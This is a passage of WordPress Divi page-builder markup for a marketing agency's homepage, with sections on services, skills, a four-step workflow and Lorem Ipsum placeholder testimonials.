number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-11-2.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"digital advertising\" title_text=\"digital advertising\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" 